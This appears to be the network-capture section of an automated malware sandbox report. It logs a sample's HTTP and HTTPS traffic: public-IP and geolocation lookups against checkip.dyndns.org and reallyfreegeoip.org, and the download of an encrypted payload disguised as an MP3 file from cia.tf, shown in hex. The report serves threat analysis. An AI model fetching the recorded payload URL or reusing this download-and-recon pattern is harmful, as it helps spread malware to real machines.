                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        12192.168.2.549856193.122.130.0806184C:\Users\user\AppData\Roaming\ishon.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Nov 25, 2024 15:00:13.108895063 CET151OUTGET / HTTP/1.1
                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                        Host: checkip.dyndns.org
                                                                        Connection: Keep-Alive
                                                                        Nov 25, 2024 15:00:18.952763081 CET320INHTTP/1.1 200 OK
                                                                        Date: Mon, 25 Nov 2024 14:00:18 GMT
                                                                        Content-Type: text/html
                                                                        Content-Length: 103
                                                                        Connection: keep-alive
                                                                        Cache-Control: no-cache
                                                                        Pragma: no-cache
                                                                        X-Request-ID: f1b43c10483b4bef337e1e9b288b11b0
                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        13192.168.2.549877193.122.130.0806184C:\Users\user\AppData\Roaming\ishon.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Nov 25, 2024 15:00:20.874562979 CET151OUTGET / HTTP/1.1
                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                        Host: checkip.dyndns.org
                                                                        Connection: Keep-Alive
                                                                        Nov 25, 2024 15:00:26.039747000 CET320INHTTP/1.1 200 OK
                                                                        Date: Mon, 25 Nov 2024 14:00:25 GMT
                                                                        Content-Type: text/html
                                                                        Content-Length: 103
                                                                        Connection: keep-alive
                                                                        Cache-Control: no-cache
                                                                        Pragma: no-cache
                                                                        X-Request-ID: b9900e96720ae3a69fed3cab747a863b
                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>


                                                                        HTTPS Proxied Packets

                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        0192.168.2.549710104.21.1.1824435144C:\Users\user\Desktop\LAQfpnQvPQ.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-11-25 13:59:03 UTC92OUTGET /12e2f2f2315804d08baebc78b9269ad1.mp3 HTTP/1.1
                                                                        Host: cia.tf
                                                                        Connection: Keep-Alive
                                                                        2024-11-25 13:59:04 UTC967INHTTP/1.1 200 OK
                                                                        Date: Mon, 25 Nov 2024 13:59:03 GMT
                                                                        Content-Type: application/octet-stream
                                                                        Content-Length: 960008
                                                                        Connection: close
                                                                        Cache-Control: public, max-age=14400
                                                                        content-disposition: attachment; filename="Ccisayi.mp3"
                                                                        etag: W/"ea608-19360808993"
                                                                        last-modified: Sun, 24 Nov 2024 23:27:36 GMT
                                                                        x-powered-by: Express
                                                                        CF-Cache-Status: REVALIDATED
                                                                        Accept-Ranges: bytes
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mziF2njMmRpekpzB1sPnsKqouou0pK5FM%2FLjp1HmAjfWxaVTw17jYTlsK26K0T7C1a0HUkjoEI%2B%2FKSGGBx8o%2BapC2wp3XkRb3g64hRA0b5lKAW5mxdz20sE%3D"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8e8228377956425f-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1724&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2807&recv_bytes=706&delivery_rate=1525600&cwnd=235&unsent_bytes=0&cid=f408332f55abbe7c&ts=793&x=0"
                                                                        2024-11-25 13:59:04 UTC402INData Raw: be d7 5d fb 75 20 81 4b e1 4c b2 9d d9 3a db 85 a7 17 e3 84 c5 0f 7d 61 75 7e 94 e2 6c d7 ff 2c 95 b4 89 3f ef 3f 57 6e 79 4d 3e f4 11 8c ba c4 34 05 2a 2a 2d d6 d5 3d 65 e0 65 26 94 e9 75 15 9c b8 c5 32 8f e9 06 14 cf c5 15 03 21 ff d4 4b 6c a5 55 35 37 f0 48 3b fb d5 b9 fb c1 6f 26 04 50 0d 30 06 dd c9 34 64 d5 1d 15 4a b9 57 41 a3 db 9b f2 54 e4 5c 14 eb ce 4e 8d 26 dc 53 67 10 e3 58 3b ff 52 93 16 51 43 57 57 67 6c 6c a0 f2 c4 59 3d 6c cc 30 40 62 9c f2 24 d6 73 20 f3 bc 4f 27 d8 8f 9e a0 06 b9 e5 15 ac fa 95 78 ee ee 56 a5 15 d9 ca 9d 76 e6 f7 e3 a9 a1 61 30 0c 00 84 ab 32 4d 49 be b0 4b d3 82 48 75 0c 33 8f 12 74 dc 74 4b 5a 65 8f 73 71 40 39 6d 16 a8 7c 16 84 51 eb 0a 01 f3 dd aa 36 70 6e ab 4e 72 9a 72 b7 ce 9d 61 54 da 17 d1 7e cc e3 d8 e3 8d 8f
                                                                        Data Ascii: ]u KL:}au~l,??WnyM>4**-=ee&u2!KlU57H;o&P04dJWAT\N&SgX;RQCWWgllY=l0@b$s O'xVva02MIKHu3ttKZesq@9m|Q6pnNrraT~
                                                                        2024-11-25 13:59:04 UTC1369INData Raw: f4 18 b3 2b 7e d7 c4 06 15 18 01 3d d0 fb 49 91 a4 a9 64 95 aa 40 c8 75 3f 06 e7 da 9c 2c 18 bd 42 a2 86 11 d2 37 43 14 38 46 45 47 e3 ef ab ce 06 3c 65 83 a9 2c db f1 14 b0 55 71 b3 da b1 4b 3f 4e 8b fd 7d 00 cc a4 c4 dc f8 1e 46 69 c4 29 8b ad d3 ba d4 b8 68 e9 eb e8 ea 81 c9 a1 93 b1 52 30 f6 5c 05 3c cf e6 b6 84 0d 38 17 bb 3f 6c 63 91 66 53 68 0f d2 60 52 f2 3d 39 e8 05 0c ff 7b a3 c6 89 d4 30 60 8c da 2c 71 51 53 ee 14 60 ae 61 03 1d 13 3e bb c7 4d 0c 5e 5d 55 0a 34 77 04 05 ec f3 94 9c d3 87 d2 77 f2 69 50 73 a6 3c fe 15 7a eb aa 2b 27 f0 7a c2 c6 75 7d ee 06 cc 6f 14 20 1f e9 8e b3 8f a3 0d 6d 0d b7 e1 70 8c 3c 9a bc a2 91 ff 76 c4 7d ad 18 5d 9d 5b 85 18 ad 03 e8 43 87 e2 21 e2 dd af 36 30 3b ba 27 d2 1d ee 0a fb b8 bb 54 ed 1d d7 91 ff b3 c4 5a
                                                                        Data Ascii: +~=Id@u?,B7C8FEG<e,UqK?N}Fi)hR0\<8?lcfSh`R=9{0`,qQS`a>M^]U4wwiPs<z+'zu}o mp<v}][C!60;'TZ
                                                                        2024-11-25 13:59:04 UTC1369INData Raw: 7a 9e a6 58 5a 56 ac 5a f4 05 8a 89 b2 91 05 90 ba 00 2c 93 79 b4 ff 65 04 e9 c1 aa d5 22 a9 26 8a 41 64 54 98 d5 5f 4f 10 92 6f f2 3a cd 95 21 a8 d1 4d 3c 6b 62 69 69 d4 ad b8 dc 41 f7 f7 34 05 91 ae 80 a5 76 74 46 e8 c3 19 23 97 31 44 54 5e 1d 6c 9d ba 06 7e cf 25 f4 8e c7 5a ea 07 aa 1d 3f bb 0a 04 37 c0 50 3b fd 7b 34 e1 6f 8c 72 db 2e b0 e2 81 5f 99 0d a7 73 c8 f4 10 93 5b 38 cc 3c 6c 8b 59 c3 97 31 9c b8 a1 e1 c8 0f 3a 1e 9a bd e9 94 00 35 b3 5a 03 ed 1e f7 9d 40 8a 36 d4 79 8c d3 d0 d7 d0 bc 35 f5 b7 3e a3 45 cc b4 0b 0a d2 db db 7f 16 21 b7 49 d6 62 25 32 30 f8 18 ba a0 00 8d 42 7f b1 47 dc 54 2e 4e 03 7d d7 14 8c 7e e0 54 9b f3 8c f1 f6 e4 d0 0a 41 07 3a 45 1d 27 aa b9 cc 9a 12 ec 56 9e a0 ae 80 fc d6 24 48 94 71 28 c0 3e 54 59 82 98 07 79 e9 91
                                                                        Data Ascii: zXZVZ,ye"&AdT_Oo:!M<kbiiA4vtF#1DT^l~%Z?7P;{4or._s[8<lY1:5Z@6y5>E!Ib%20BGT.N}~TA:E'V$Hq(>TYy
                                                                        2024-11-25 13:59:04 UTC1369INData Raw: 95 1b 31 77 56 ef ed c7 19 e0 ac a2 8c a7 52 71 8d c0 8d 0b 5a ae 6c bf 53 0a 1f f4 5e 9f 7f f6 0a 09 c3 a3 d5 ce 9b c4 9c 50 96 9d dc 5e c3 9d bf c3 f9 59 a2 8d 30 03 09 d2 37 aa e2 0c 17 2f e5 8f 62 06 3d 55 03 a9 23 95 18 84 a9 32 6b e8 11 e7 51 8a a6 8b 8b 3c c9 32 01 fe 80 89 d0 89 5d 87 a5 dc 51 af 49 9f 8b 4f c8 62 38 d0 e6 d1 c7 b1 d4 50 c4 a6 6f 0c 35 9f fd 23 cf cd 42 01 8c 48 5d d7 86 e0 85 85 22 6f f0 42 bd 10 5b a1 b6 c3 b0 c5 1b e4 04 f6 2e a9 c8 e7 13 0e 06 d1 aa 1d 3a 67 43 82 e2 a2 33 4b 63 8f a3 17 4f 43 73 2f ea 5a 0d ef 26 e6 a2 0f bb 9e b3 ab e8 f9 85 45 6c 13 3b 1b c8 4e fe 0c 2e bd bc 45 f5 18 cd b4 45 d5 ac 39 73 3e 1f d8 e6 fa 17 b6 ce ca e7 82 17 de 5e 8c 38 7b 8b f3 59 31 bb 34 7e 4a 2e 18 d2 16 e6 97 6f bd c5 23 44 eb 05 3d 86
                                                                        Data Ascii: 1wVRqZlS^P^Y07/b=U#2kQ<2]QIOb8Po5#BH]"oB[.:gC3KcOCs/Z&El;N.EE9s>^8{Y14~J.o#D=
                                                                        2024-11-25 13:59:04 UTC1369INData Raw: d5 b2 18 33 a3 f4 e4 bf 11 25 89 e4 f2 b1 f0 14 21 74 0f 2a 4e 21 71 3c db 7f 4f 97 ad a8 40 46 ee 19 ad b3 26 ee e7 2a 0f ea 53 23 df 54 a3 50 3f 06 77 e0 0a 51 1f 48 15 72 09 80 05 ae bc 73 7f ac f1 2d 46 b3 c1 22 4d c8 42 74 78 e3 ae 05 25 ff 34 5b 79 02 16 db 88 e9 c9 b9 4a 32 d1 25 53 2f fc 04 95 56 ac 0b d0 11 ff ce 41 c5 70 5e 9a 24 16 4e c5 95 da 3a b4 96 7e d1 bf 86 10 93 6e 6b dd 9e 7b a6 77 b1 ac d9 18 1d 69 68 46 8e 1e 85 39 ad 6b 19 25 88 e5 2e ad e3 31 a5 8c 98 ef dd 1b 40 c7 b1 e3 f5 55 ce f5 61 50 fe e6 fe c8 1a f0 83 5b 64 70 68 77 ac 44 45 63 98 06 9c 62 bf c0 dd 39 da 02 36 ee c0 32 93 30 1c 4c 17 96 b5 25 e6 a9 0f 57 5f 56 36 e2 b1 41 3b 90 c2 f3 0d 1e 44 ca d0 0d 80 10 66 18 e9 64 60 4e a9 6f 73 04 8b f2 b3 21 03 88 b3 a9 33 df e2 96
                                                                        Data Ascii: 3%!t*N!q<O@F&*S#TP?wQHrs-F"MBtx%4[yJ2%S/VAp^$N:~nk{wihF9k%.1@UaP[dphwDEcb9620L%W_V6A;Dfd`Nos!3
                                                                        2024-11-25 13:59:04 UTC1369INData Raw: b9 0d 65 bc fe b2 e1 ec 18 83 8a f8 6d c5 30 f0 63 54 00 af 97 06 48 c9 98 ff a2 67 bf 23 e3 c2 7d 5c 6a b8 92 17 8c a8 cb 80 fc c0 d8 0d 48 44 55 ca 2d 04 e4 de 58 6a 29 d4 40 cf bd d6 b2 d0 c2 3f 11 be 2d d4 20 a6 20 4a 29 d2 b5 43 eb 5c 89 8b ad d2 06 cf 80 d0 3f 3c c2 67 34 1c 34 ee cb d1 b5 70 34 74 59 da a6 f8 81 92 49 10 93 9a 92 b3 ca d0 3b d9 5c ff 29 98 e9 92 3b bd 70 28 68 92 22 7e 10 bc 38 f8 b0 cf 26 ca 41 4d 92 fa 30 e5 a0 63 8c c8 74 81 a5 73 10 aa eb 05 dc e3 29 41 d0 1f 27 a1 0c d6 69 c7 0e 64 c9 f7 7a 3c 1b c8 aa 52 08 77 d7 26 d8 e0 56 d3 d8 5a 87 21 12 01 8f 33 c8 ce ff 83 ec 8e 5c 71 55 7e 4a 3b 17 05 27 78 d0 6c 75 98 4b 7b 8c cd 98 48 31 59 ff 91 38 67 51 ac bc 30 92 fc 90 59 20 fa 51 72 e6 7c e9 08 3c 36 dd 2e 4a bb fe 4f 93 9b d5
                                                                        Data Ascii: em0cTHg#}\jHDU-Xj)@?- J)C\?<g44p4tYI;\);p(h"~8&AM0cts)A'idz<Rw&VZ!3\qU~J;'xluK{H1Y8gQ0Y Qr|<6.JO
                                                                        2024-11-25 13:59:04 UTC1369INData Raw: 3b 0c cc 17 d6 c8 f7 0b 79 83 bb b8 fb 9a 00 4f c8 ed 99 46 66 f9 9f 87 a8 22 a3 6f 6f aa 8a a9 49 58 48 ad 9f c4 2f 32 68 e8 0b d5 b4 8f 65 ae 86 aa e9 60 0f 8d 34 0c 7e 4e a7 c0 57 c9 66 47 fa fb cd 5a eb f9 5a f2 c0 05 f8 33 28 e5 14 9d 59 b9 94 9d c1 fc 6d 8f 7c a5 ce 6a 77 84 3a 65 d8 be 77 af de ea b3 2e 73 63 e9 68 36 10 d2 7b d2 a7 22 35 e0 6a 79 1c e8 d4 a1 6c 0f a1 11 ce 7c ac df 3f 8c 2a 99 e6 25 2e 9a b1 60 0d ec 77 c5 dd d2 8f 31 6b 23 1c 56 4e 7c 2d 76 dc c7 a7 e7 6f 89 7c a1 31 ee 40 00 98 e9 ae 60 2d c8 f5 0c 35 9a 3c 99 22 b7 a5 20 1e 66 a5 af e7 5b 40 46 89 35 45 06 c8 6a 45 b6 a6 8e 74 9f 03 a3 ae 1a 5d 1e 61 ea 27 d0 eb 54 0d 92 48 7c cb 2a f5 94 22 c0 7d ea a5 ae 02 0e 64 ee 37 a3 aa 1c 2b 67 65 0e 8b 9f 6f fd 9e ad b9 4e 21 86 55 44
                                                                        Data Ascii: ;yOFf"ooIXH/2he`4~NWfGZZ3(Ym|jw:ew.sch6{"5jyl|?*%.`w1k#VN|-vo|1@`-5<" f[@F5EjEt]a'TH|*"}d7+geoN!UD
                                                                        2024-11-25 13:59:04 UTC1369INData Raw: 81 31 40 66 2d ad e4 de 24 c1 e9 c5 e8 09 b4 bb f7 a9 c9 6a e8 4a b6 f0 39 b4 a6 96 1e 6b 11 26 a0 e9 cc 0e a6 7c 66 e0 e5 1d 9f ff f2 20 88 36 45 44 ec fd 28 33 d7 8e ba 6c 2e cc 0e da 54 32 06 03 68 44 c5 3e c9 af 21 a7 84 24 8b e4 bb fa 84 ca 41 7c cc 0f dd 20 33 8e 25 31 5b 36 b5 00 02 62 01 8e 6b bf be 02 3b 9f 65 fc fb 97 4d 47 15 29 0c ce ad 99 f5 99 a3 83 20 d7 13 6b b5 8d 0f 03 fe 41 65 9d a3 97 ac e7 29 89 56 96 5f d3 f2 48 09 90 52 21 60 a7 d5 5f 88 11 ae 5b 95 b2 35 21 bd 7c ba a7 1a a9 7b 54 f5 14 3e f9 82 fd af 19 64 3c 6e 75 2a 97 49 80 7d 6a 29 a6 4a a6 7e 8f 41 44 e9 51 36 9a 5c 90 00 1f 48 6f 92 48 06 e0 13 41 3f 19 fa 96 84 a0 14 4a 80 e7 03 9e 7d de b5 0c 73 14 d0 27 6c 81 72 a8 56 10 21 b4 be 7e f2 0b 13 ff d1 8c de 02 cd b3 fb 08 e3
                                                                        Data Ascii: 1@f-$jJ9k&|f 6ED(3l.T2hD>!$A| 3%1[6bk;eMG) kAe)V_HR!`_[5!|{T>d<nu*I}j)J~ADQ6\HoHA?J}s'lrV!~
                                                                        2024-11-25 13:59:04 UTC1369INData Raw: 34 49 54 a9 2f 35 ed d9 78 e9 43 1b cb 96 78 b2 79 1f c3 4b 64 d1 48 05 1f 62 1e b5 9e 16 a8 b1 15 04 25 93 0f b1 8d 97 0c 7a c2 9f db 4b b3 ce 90 ac 8c 87 92 5c 7e 94 da b7 8d 9c e9 2f 8c 59 29 14 40 ea fd 73 f4 5b f3 9d fe 56 e2 79 06 09 26 6c 29 70 99 a1 0a 21 df c8 2a 64 15 2f e4 7f 00 c4 a7 a1 bb 1a ba 1f 6b 24 9d 38 fd 69 1a e7 a1 b6 5d 7c 78 36 e8 9f b6 e2 28 09 e9 a7 8e 84 92 4a 8e 2d c4 56 dc 0b 20 0c 02 db 1d c0 13 bf e9 47 cc 32 6b f8 f1 32 85 ef ff 65 34 42 a5 77 0e c3 13 c3 82 7c 09 89 b0 83 9a 6b 56 20 86 91 ef 6e b4 d7 89 e1 ba 94 47 18 00 9f 46 b2 41 be 87 ff 43 c3 b8 67 3d 9c 6b eb b3 ec 11 08 8f 82 8d 97 53 44 02 11 be 82 ba ef 3a 2a df d5 4e 23 52 a1 6b 60 9a 98 26 93 69 6c 8a a7 6f e2 9f 3d 5c b2 34 a0 db 06 ab b3 f9 e6 bc 1c cd 76 cd
                                                                        Data Ascii: 4IT/5xCxyKdHb%zK\~/Y)@s[Vy&l)p!*d/k$8i]|x6(J-V G2k2e4Bw|kV nGFACg=kSD:*N#Rk`&ilo=\4v
                                                                        2024-11-25 13:59:04 UTC1369INData Raw: 98 81 b6 2e 27 d7 f0 5e 3d 83 3b 33 a9 0d 17 89 1f 28 33 29 ba 75 11 72 cc dd d0 49 c0 96 d4 ff 4e 8d 14 18 de fa 54 8b c3 47 6e 79 ac c7 d7 bc e5 6b 04 f2 5c 71 b0 cd 68 eb 2f 67 17 cc 77 53 32 a7 da c7 a6 24 71 9c 26 3d a4 96 f9 32 2f e9 d9 0e 93 24 89 a4 13 8d 94 fe 91 90 65 a9 d5 23 c8 5f ff cb 6c f4 40 3c 6c 56 91 b2 75 d7 19 73 6a da d5 0d 01 4d 61 96 f7 04 a6 8b a2 49 88 6b f9 bf ad 37 02 1e 74 fd 7a 10 78 77 a9 55 23 58 85 24 5f e5 d5 b2 b5 93 c0 e3 28 02 6c 48 d5 84 3d 16 7d d3 9d 01 1c 83 b7 d6 37 19 b0 3a 08 76 d4 5c 33 54 f1 d7 b6 a7 d5 f0 12 d0 6d a1 43 de b0 cb 00 05 e6 cc 59 82 a4 1d cf c3 37 0d a8 ad f1 5f 6e c0 08 31 0b c4 3c 21 8f 7d f2 5b ce 90 44 e1 7f 23 7f d3 46 5b 6c c6 27 5b 98 8d e5 e4 73 26 b0 69 8b 6b 55 35 d0 e8 58 f7 be 0b a2
                                                                        Data Ascii: .'^=;3(3)urINTGnyk\qh/gwS2$q&=2/$e#_l@<lVusjMaIk7tzxwU#X$_(lH=}7:v\3TmCY7_n1<!}[D#F[l'[s&ikU5X


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        1192.168.2.549716172.67.177.1344436364C:\Users\user\Desktop\LAQfpnQvPQ.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-11-25 13:59:22 UTC84OUTGET /xml/8.46.123.75 HTTP/1.1
                                                                        Host: reallyfreegeoip.org
                                                                        Connection: Keep-Alive
                                                                        2024-11-25 13:59:23 UTC851INHTTP/1.1 200 OK
                                                                        Date: Mon, 25 Nov 2024 13:59:22 GMT
                                                                        Content-Type: text/xml
                                                                        Content-Length: 361
                                                                        Connection: close
                                                                        Cache-Control: max-age=31536000
                                                                        CF-Cache-Status: HIT
                                                                        Age: 507071
                                                                        Last-Modified: Tue, 19 Nov 2024 17:08:11 GMT
                                                                        Accept-Ranges: bytes
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sg8HEh0cWCiIMCe%2BgmlVaNK7qxFYE0gurDEJOIjhrZVAC99Ic0Z5p67wKubuWRw96iueZqHxyz23NQCrgy%2BYOD96Y3SwGLpGjsxw0LpZsyKep1jepsWG%2Flki1O4UiRKrvpYvUCt9"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8e8228afae5d41f2-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1692&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=698&delivery_rate=1665715&cwnd=224&unsent_bytes=0&cid=c624bc4e7c0e4f60&ts=725&x=0"
                                                                        2024-11-25 13:59:23 UTC361INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f 6e
                                                                        Data Ascii: <Response><IP>8.46.123.75</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZon


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        2192.168.2.549724172.67.177.1344436364C:\Users\user\Desktop\LAQfpnQvPQ.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-11-25 13:59:24 UTC60OUTGET /xml/8.46.123.75 HTTP/1.1
                                                                        Host: reallyfreegeoip.org
                                                                        2024-11-25 13:59:25 UTC851INHTTP/1.1 200 OK
                                                                        Date: Mon, 25 Nov 2024 13:59:24 GMT
                                                                        Content-Type: text/xml
                                                                        Content-Length: 361
                                                                        Connection: close
                                                                        Cache-Control: max-age=31536000
                                                                        CF-Cache-Status: HIT
                                                                        Age: 507073
                                                                        Last-Modified: Tue, 19 Nov 2024 17:08:11 GMT
                                                                        Accept-Ranges: bytes
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5adexoPL7T5uNy5lXAMOpukLI4Bw8cA6EOayv914I6QUHi1AMBY5ESdWJ9BO7xTJDGLNyDEAGCwhpk68nbzHoiaxpkWpQEJNHAd59xw3o%2FubPHfVhhP2KYjuFFFtzsh%2BK%2FPOvPRM"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8e8228bc8cf9c33f-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1702&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2848&recv_bytes=698&delivery_rate=1709601&cwnd=233&unsent_bytes=0&cid=bd68a1bbe45c6b09&ts=460&x=0"
                                                                        2024-11-25 13:59:25 UTC361INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f 6e
                                                                        Data Ascii: <Response><IP>8.46.123.75</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZon


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        3192.168.2.549732172.67.177.1344436364C:\Users\user\Desktop\LAQfpnQvPQ.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-11-25 13:59:27 UTC60OUTGET /xml/8.46.123.75 HTTP/1.1
                                                                        Host: reallyfreegeoip.org
                                                                        2024-11-25 13:59:27 UTC851INHTTP/1.1 200 OK
                                                                        Date: Mon, 25 Nov 2024 13:59:27 GMT
                                                                        Content-Type: text/xml
                                                                        Content-Length: 361
                                                                        Connection: close
                                                                        Cache-Control: max-age=31536000
                                                                        CF-Cache-Status: HIT
                                                                        Age: 507076
                                                                        Last-Modified: Tue, 19 Nov 2024 17:08:11 GMT
                                                                        Accept-Ranges: bytes
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6AmY8%2FSL1QMwVwTmyfv8szoXiEntwcgfKrjA9lnt0WMhsIxlyhAfnVGKcrBcRkXMXVi4nRHmodPzXT60Ge7eP9%2B6qYZguyCe0kA4gcVg4Jsw1GgySy%2Bc23zkYJS7J08jwcuLzkhc"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8e8228cedcdf1906-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1547&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=698&delivery_rate=1844598&cwnd=252&unsent_bytes=0&cid=55b3214f1bfde512&ts=468&x=0"
                                                                        2024-11-25 13:59:27 UTC361INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f 6e
